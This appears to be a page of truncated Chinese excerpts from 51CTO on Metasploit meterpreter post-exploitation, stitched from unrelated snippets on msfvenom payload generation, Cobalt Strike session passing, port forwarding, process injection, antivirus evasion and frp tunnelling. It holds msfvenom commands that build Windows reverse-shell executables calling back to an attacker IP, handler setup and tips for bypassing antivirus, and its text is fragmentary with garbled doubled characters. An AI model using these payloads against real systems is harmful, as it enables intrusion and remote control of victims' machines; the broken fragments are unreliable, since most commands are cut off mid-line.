0x01 背景 meterpreter作为后渗透模块有多种类型,并且命令由核⼼心命令和扩展库命令组成,极⼤大的丰富了了攻击⽅方式。 需要说明的是meterpreter在漏漏洞洞利利⽤用成功后会发送第二阶段的代码和meterpreter服务器器dll,所以在⽹网络不不稳定的情况下经常出现没有可执⾏行行
Installation curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > ms
cp LHOST=10.211.55.2 LPORT=3333 -a x86 --platform Windows -f exe > shell.exe msfvenom -p windows/
1、cobaltstrike创建监听器 2、metasploit派生shell msf5 exploit(multi/handler) > use exploit/windows/local/payload_inject msf5 exploit(windows/local/payload_inje
1、msf创建监听 msf5 > use exploit/multi/handler msf5 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp payload => windows/x64/meterp
meterpreter > portfwd add -l 3333 -p 3389 -r 172.16.100.30 [*] Local TCP relay created: :3333 <-> 172.16.100.30:3389 该命令的意义是,将本地的3333端口的数据转发到远端172.16.
一般来说使用msfvenom生成的payload会单独开启一个进程,这种进程很容易被发现和关闭,在后期想做持久化的时候只能再使用migrate进行。 其实在生成payload时可直接使用如下命令,生成的payload会直接注入到指定进程中。 msfvenom -p windows/meterpret
-p, –payload < payload> 指定需要使用的payload(攻击荷载)。也可以使用自定义payload,几乎是支持全平台的 -l, –list [module_type] 列出指定模块的所有可用资源. 模块类型包括: payloads, encoders, nops, all -n
这是green-m大佬提到的一种方式,使用reverse_https等payload时可以使用下列方法bypass部分杀软。 生成payload: msfvenom -p windows/meterpreter/reverse_https lhost=10.211.55.2 lport=3333 -
windows:msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -e x86/shikata_ga_nai -b 'x00x0axff' -i 3mac:msfvenom -a x86 --platform osx -p osx/x86/shell_rever
下载frp Github项目地址:https://github.com/fatedier/frp 找到最新的releases下载,系统版本自行确认。 下载方法: wget https://github.com/fatedier/frp/releases/download/v0.16.1/frp_0.
Back参数 Back参数主要⽤用于返回。⽐比如你进⼊入了了某⼀一
pivot是meterpreter最常用的一种代理,可以轻松把你的机
Copyright © 2005-2024 51CTO.COM 版权所有 京ICP证060544号